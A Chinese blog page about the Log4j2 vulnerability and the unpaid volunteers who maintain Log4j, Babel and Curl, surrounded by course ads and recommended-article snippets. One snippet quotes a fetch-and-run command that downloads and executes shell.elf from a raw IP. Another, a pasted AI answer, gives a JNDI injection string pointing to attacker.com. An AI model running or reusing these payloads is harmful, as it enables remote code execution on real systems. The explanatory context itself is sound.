史诗级漏洞爆发,Log4j 背后的开源人何去何从?_log4j-core 开源团队(1)

最新推荐文章于 2025-12-05 02:06:49 发布
原创 最新推荐文章于 2025-12-05 02:06:49 发布 · 1.2k 阅读 · 23 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#c语言 #c++ #学习

img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上C C++开发知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以戳这里获取

“Log4j 维护者一直在为缓解措施而失眠;修复错误、文档和 CVE,还要回应他人的询问。即便如此,他们还要遭受许多严厉的批评乃至抨击——哪怕这份工作没有任何酬劳,哪怕这个为了向后兼容而保留的功能我们其实也不喜欢。”

在这里插入图片描述
Volkan Yazıcı 这个回应可谓“一石激起千层浪”,不仅是因为漏洞起源,更多的是因为他所说的“这份工作没有任何酬劳”:从此次 Apache Log4j2 漏洞的影响范围来看,将其看做打入互联网的“半壁江山”也不为过,这样一个使用广泛的开源项目,背后维护者没有得到赞助吗?

没有,几乎没有。从 Cryptogopher+Go 团队安全负责人 Filippo Valsorda 在推特上发布的截图来看,在本次事件发酵之前,赞助 Apache Log4j2 项目的只有 3 人——一个应用于整个互联网行业“半壁江山”的开源项目,只有 3 个人赞助

在这里插入图片描述
不仅如此,据网络安全记者 Catalin Cimpanu 表示,Apache Log4j2 主要是由三名志愿者在他们的业余时间进行维护工作的

在这里插入图片描述
对此,Filippo Valsorda 不禁发推呼吁:

“这就是修复了导致数百万美元损失的漏洞的维护者:‘我在业余时间维护 Log4j’、‘一直梦想全职做开源’、‘只有 3 个人在资助 Ralph Goers(Apache Log4j2 项目创始人)’。人们,我们正在做什么啊?

在这里插入图片描述

所幸,截至发稿,项目赞助者已增至 63 人

二、被“白嫖”的项目比比皆是

除了 Apache Log4j2,还有许多开源项目也陷于类似处境。

  • Babel

Babel 是一个用于 JavaScript 的通用多用途编译器,开发者通过 Babel 可以使用(或创建)下一代的 JavaScript 以及 JavaScript 工具,许多主要框架(React,Vue,Ember,Polymer)以及著名公司(Facebook,Netflix,Airbnb)都是 Babel 的用户

可就是这样一个影响深远的开源项目,却依旧陷入了财务危机:今年 5 月 Babel 宣布,由于花钱速度持续高于获取捐赠的速度,Babel 已经陷入了财务困境,当前剩余的资金将很快被用完,该项目储备资金目前只够维持到 2021 年底

  • Curl

今年 11 月,有用户向苹果请求更新 macOS 12 中与 Curl 有关的信息,结果苹果直接回复用户让他自行联系 Curl,并提供了 Curl 的帮助页面地址。

此事引发开源项目 Curl 创始人 Daniel Stenberg 极度不满,直接怼了一通:“想象一下,一家市值万亿美元的公司将各种开源组件组合在一起,每年可从中获利数十亿美元。当用户就其提供的产品寻求帮助的时候,这家公司反而将用户推给开源项目。这个开源项目是志愿者运营和维护的,而这家公司(苹果)从没有赞助过一分钱。”

需要明确的是,Daniel Stenberg 只是针对苹果利用 Curl 获利并将用户需求推给 Curl 的做法感到不满,他选择将 Curl 免费开源时也并非是为了挣钱,而是“曾在开源中受益匪浅,因此想通过开源的方式回馈给开源世界,让世界变得越来越美好。”

三、“这就是开源丑陋的一面”

由 Apache Log4j2 揭示的开源项目维护者艰难处境的问题,在网络上引起了轩然大波。

有人怀疑这只是项目维护者推脱的理由

“如果他们得到报酬,他们会写出更好的代码吗?荒谬!”

也有人为项目维护者打抱不平

“也许不会,但至少有一些补偿可以让他们忍受那些免费使用他们的软件并在软件损坏时受到无尽抱怨的吃力不讨好。要知道,自由软件的全部意义在于您拥有源代码并且可以自由地自行修复它。”

也有人感慨这就是开源的现状

“不幸的是,这就是开源丑陋的一面。当项目顺利进行时,一切都很好。但是当项目出问题了,每个人都会抱怨。可笑的是,通常抱怨最多的人贡献最少,这就导致那些拥有一些世界上最常用项目的才华横溢的开发人员,几乎没有得到认可。”

四、专家:安全漏洞无法避免

针对这场争议,优快云 也向几位开源领域的专家询问了对此事的看法。

开源社理事长庄表伟指出,软件出现 Bug、漏洞或者安全风险,本质上是一个技术问题,无法避免,只能尽快修复。而随着软件世界使用的开源软件越来越多,引入的风险就会不断增加,同时一款开源软件被使用的范围越来越广,这款开源软件出现漏洞所造成的损失也会不断增大。

基于此,构成了对“开源供应链风险趋势”的基本判断或出发点,即提升风险应对能力,识别潜在风险源头和预防风险发生

1、提升风险应对能力,首先是企业的责任(不能假设自己下载回来的开源软件,就是安全的,自己要有风险意识,要能应对各种突发状况。)
2、识别潜在风险源头,这个是整个开源生态的责任,最好的做法是类似于OpenSSF的组织,开展系统性的工作。(这方面刚刚起步,但是未来应该是开源领域的重要趋势)
3、预防风险发生(当然还包括及时修复 Bug),这个是开源社区(开发团队)的工作,大家可以帮助他们改进,但是本质上还是要靠他们自己。

img
img

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加戳这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

8825)**

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

史诗漏洞爆发Log4j 背后开源何去何从
m0_50065287的博客
12-13 1万+
开源并不如我们想象的那般光鲜。
Log4j史诗漏洞
weixin_41942838的博客
12-25 1843
Log4j史诗漏洞,从原理到实战,只用3个实例就搞明白! Log4j2史诗漏洞
Babel安全配置终极指南:10个避免常见安全漏洞的关键技巧
最新发布
gitblog_00069的博客
12-05 1068
Babel作为现代JavaScript开发的基石编译器,正确的安全配置对于保护您的应用程序免受潜在威胁至关重要。Babel安全配置涉及多个层面,从编译假设到依赖管理,都需要精心设计。本文将为您揭示10个避免常见安全漏洞的关键配置技巧,帮助您构建更加安全的JavaScript编译环境。🚀 ## 为什么Babel安全配置如此重要? Babel处理的是您的源代码,任何配置不当都可能导致代码注入、依
log4j漏洞原理及攻击流程
weixin_54603520的博客
05-14 2745
log4j漏洞最早出现在202111月24日一位阿里安全团队的员工发现的,上报到Apache之后,12月10日凌晨才被公开。该漏洞威胁等较高。基本比肩与阿里当年的fastjson漏洞
Log4j 漏洞最早由阿里云团队发现;HashiCorp 挂牌上市,市值 152 亿美元;Go 1.18 Beta1 发布 | 开源日报
开源吞噬世界。
12-15 1万+
一文速览国内外今日的开源大事件!
log4j2的核弹漏洞是如何被发现的?
程序猿DD
12-19 2724
开篇上一篇文章log4j2的codeql规则我看了codeql官方的规则,然后发现了一个2020年的规则,从而推出很可能是codeql挖到的(现在哪个大佬还一个个代码看idea挖洞啊,那都...
log4j2史诗漏洞攻击重现
12-10 7837
log4j2远程执行命令漏洞
log4j漏洞分析及总结
热门推荐
csd_ct的专栏
02-14 5万+
202112月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】,堪称史诗核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。 漏洞描述及影响 log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详的公司的系统都在使用该框架。
信息安全-史诗漏洞Log4j漏洞机理和防范措施
码者人生的技术博客
12-31 6415
信息安全-史诗漏洞Log4j漏洞机理和防范措施及对安全能力建设的思考
刚刚公布的 Log4J史诗安全漏洞 CVE-2021-44228 你处理了吗?
weixin_45987961的博客
12-15 5692
发生什么事了 Log4J 是一个应用非常广泛的Java库,就在前两天的202112月10日,Log4J的一个安全漏洞被公布了。那天正好是周五,很多程序员都在计划着怎么度过一个愉快的周末,不料这个安全漏洞的公开,使得全世界很多程序员不得不周末加班,有的甚至通宵达旦紧急应对。 漏洞编号为CVE-2021-44228 ,攻击者利用这个新的零日漏洞,可以远程执行恶意代码。 零日漏洞( zero-day )通常是指还没有补丁的安全漏洞。零日漏洞利用(zero-day exploit)的程序对网络安全具有..
Log4j 严重漏洞修最新修复方案参考
Javaesandyou的博客
12-21 1万+
CVE-2021-44228,原理上是 log4j-core 代码中的 JNDI 注入漏洞。这个漏洞可以直接导致服务器被入侵,而且由于“日志”场景的特性,攻击数据可以多层传导,甚至可以威胁到纯内网的服务器。log4j 作为 Java 开发的基础公共日志类,使用范围非常广,漏洞必定影响深远,想想当年commons-collections反序列化漏洞的影响范围。 Github漏洞公告: https://github.com/advisories/GHSA-jfh8-c2jp-5v3q 影响 < 2.1
安装量远超 100 亿,代码行数过 15 万,Daniel Stenberg发文回顾 curl 25 年蜕变史!...
优快云资讯
03-20 7573
【优快云 编者按】对于喜爱编程的来说,幸福是什么?于 curl 作者Daniel Stenberg而言,最大的幸福莫过于能全身心做自己感兴趣的项目!curl 25 岁生日快乐!作者 | Daniel Stenberg 整理| 梦依丹出品 | 优快云(ID:优快云news)3 月 20 日是知名开源命令行工具 curl的 25 岁生日,curl 作者 Daniel Ste...
24 年了,终于有发现 curl 的这个 Bug 了
关注微信公众号【开源Linux】,后台回复『10T』,领取10T学习资源大放送,涵盖Linux、虚拟化、容器、云计算、网络、Python、Go等书籍和视频
03-27 528
curl 作者 Daniel Stenberg 在个博客分享了一个存在 23.9 年的 curl 漏洞。curl 是常用的命令行工具,用来请求 Web 服务器,于 1997 年首次发行。据 Stenberg 透露,这个漏洞是在 curl 发布后的第 201 天引入的,但是直到第 8930 天,漏洞才修复好。一个持续了 23.9 年的漏洞背后有着怎样的故事?一切还得从 1998 年说起。curl ...
160 行代码到 200 亿安装量:Curl 的传奇故事
开源社KAIYUANSHE的博客
03-24 268
导读:本文介绍了 curl 的创始 Daniel Stenberg 在 FOSDEM 2024大会上的演讲内容。Stenberg 分享了他从事开源项目的经历和见解,强调了成功的开源项目背后并没有天才或魔法,只是长期的努力和对创意的持续追求。他还提到了 curl 项目的起源和发展历程,以及在开发过程中所遇到的挑战和教训。尽管 curl 已经成为一项广泛应用的数据传输工具,但 Stenberg 强调...
致敬,开源界的大佬们!
easylife206的专栏
10-01 1215
公众号关注「奇妙的 Linux 世界」设为「星标」,每天带你玩转 Linux !欣欣向荣的开源文化,离不开每一位为开源做过贡献的。更少不了开源界的先驱、改变世界的开源项目发起者、为开源...
log4j漏洞复现
xxx_678的博客
03-18 1903
加粗字体解码后:wget http://123.56.136.50/ccccc/shell.elf -O /tmp/shell.elf && chmod +x /tmp/shell.elf && /tmp/shell.elf。https://github.com/WhiteHSBG/JNDIExploit/releases/download/v1.4/JNDIExploit.v1.4.zip //github下载地址。视频地址:https://www.youtube.com/watch?
本地 SSL 证书生成神器,轻松解决 https
公众号-老炮说Java
11-14 674
在本地环境中配置HTTPS一直以来是开发者的痛点,手动创建SSL证书、配置信任存储不仅繁琐,还容易出错。今天给大家介绍一个开源神器——mkcert!它能让你快速生成本地受信任的SSL/TLS证书,轻松打造安全的HTTPS开发环境,成为许多开发者的首选。什么是mkcert?mkcert是由Filippo Valsorda开发的一款免费开源工具,专门用于生成受信任的本地SSL/TLS证书。它通过简单命...
深入解析著名的阿里云Log4j 漏洞
悦分享
07-24 3694
ApacheLog4j是一个基于。
log4j日志漏洞问题
feinifi的博客
11-16 4332
log4j远程漏洞复现以及对这个漏洞问题的看法。
log4j-api 历史漏洞
08-19
<think>嗯,用户现在想了解log4j-api的历史漏洞信息。从对话历史看,用户之前已经询问过Log4j2 2.17.2版本的历史漏洞,我给出了详细的分析。现在用户特别关注log4j-api模块的漏洞情况。 用户提供的引用材料很有价值。引用[3]明确指出log4j-api相当于日志门面,只提供接口定义,真正的漏洞风险在log4j-core实现模块。引用[4]提到的CVE-2021-44228漏洞影响说明也佐证了这一点——漏洞修复需要升log4j-core包。 用户可能有些混淆了API和实现模块的区别。ta可能看到漏洞公告里提到Log4j2就默认所有组件都受影响,需要明确区分。不过用户能精准提问log4j-api,说明对日志框架有一定了解,只是需要更专业的技术澄清。 考虑到用户的技术背景,解释时需要: 1. 用架构图说明API和Core的关系 2. 列举所有涉及API模块的间接漏洞(虽然核心问题都不在API) 3. 强调安全升时实际需要操作的模块 4. 补充API模块自身的安全更新记录(确实很少) 特别要注意的是引用[4]里那个史诗漏洞CVE-2021-44228,虽然问题出在Core的JndiLookup类,但因为API和Core的强关联性,所有使用log4j-api的项目都必须升Core才能修复。这个点必须重点说明。 用户可能还隐含了一个需求:想知道如何检查自己项目里的log4j-api是否安全。虽然API本身没漏洞,但需要提示ta检查配套的Core版本,这个实际建议要补充在解决方案里。</think>以下是关于 `log4j-api` 模块的历史漏洞分析及关键结论: --- ### **核心结论** 1. **`log4j-api` 本身无直接高危漏洞** - 作为日志抽象层(类似 SLF4J),仅定义接口,不包含具体实现[^3]。 - 历史漏洞(如 CVE-2021-44228)均发生在 **`log4j-core` 实现模块**中[^2][^4]。 2. **间接风险场景** - 当 `log4j-api` 与漏洞版本的 `log4j-core` 共存时,攻击者可通过日志接口触发 `core` 模块的漏洞(如 JNDI 注入)[^4]。 - 例如:调用 `logger.info("${jndi:ldap://attacker.com}")` 会激活 `core` 的漏洞逻辑[^2]。 --- ### **涉及 `log4j-api` 的漏洞修复要求** | **CVE编号** | **漏洞模块** | **修复方案** | **与 `log4j-api` 的关联** | |--------------------|--------------|------------------------------------------|------------------------------------------| | CVE-2021-44228 | log4j-core | 升 `core` 至 ≥2.15.0 (Java 8+) | 需同步升 `api` 以兼容安全版本[^4] | | CVE-2021-45046 | log4j-core | 升 `core` 至 ≥2.16.0 (Java 8+) | `api` 需匹配 `core` 版本避免冲突[^4] | | CVE-2021-45105 | log4j-core | 升 `core` 至 ≥2.17.0 | `api` 接口无变化,但需同步升依赖 | --- ### **安全实践建议** 1. **依赖管理原则** ```xml <!-- 强制对齐 api 与 core 版本 --> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-api</artifactId> <version>2.23.1</version> <!--core 同版本 --> </dependency> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-core</artifactId> <version>2.23.1</version> <!-- 当前最新安全版本 --> </dependency> ``` 2. **漏洞检测命令** ```bash # 检查 log4j-api 和 core 版本是否一致 mvn dependency:tree | grep "log4j-\(api\|core\)" ``` 3. **升优先** - **Java 8+ 项目** → 升至 `log4j-api` + `log4j-core` ≥ **2.23.1** - **Java 7 项目** → 使用 `log4j-api` + `log4j-core` **2.12.4**(最终安全版本) --- ### **常见误区澄清** ❌ *误区*:升 `log4j-api` 可单独修复漏洞。 ✅ *事实*: - 漏洞修复必须升 `log4j-core`,`api` 仅需版本对齐[^4]。 - 若仅升 `api` 而保留漏洞版 `core`,系统仍存在风险。 --- ### **历史漏洞时间线** ```mermaid timeline title Log4j2 漏洞事件与 log4j-api 的关联 section 2021-2022 2021-12-09 : CVE-2021-44228 (JNDI RCE) log4j-api 需兼容 ≥2.15.0 的 core 2021-12-13 : CVE-2021-45046 (DoS) log4j-api 需匹配 ≥2.16.0 的 core 2022-01-18 : CVE-2021-45105 (线程上下文漏洞) log4j-api 无变更,但依赖需同步 section 2023-2024 2023 至今 : 无新增 log4j-api 相关漏洞 保持 api+core 版本一致即可 ``` --- ### **相关问题** 1. `log4j-api` 和 `log4j-core` 版本必须严格一致吗? 2. 如何验证项目中是否存在漏洞版本的 `log4j-core`? 3. 使用 SLF4J + Log4j2 组合时,漏洞修复流程有何不同? 4. `log4j-api` 是否可能在未来出现独立漏洞? 5. 企业项目如何自动化监控 Log4j2 漏洞? [^1]: Log4j 2 漏洞回顾 [^2]: Log4j 漏洞原理分析 [^3]: Log4j2 模块架构说明 [^4]: Apache 官方安全公告
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值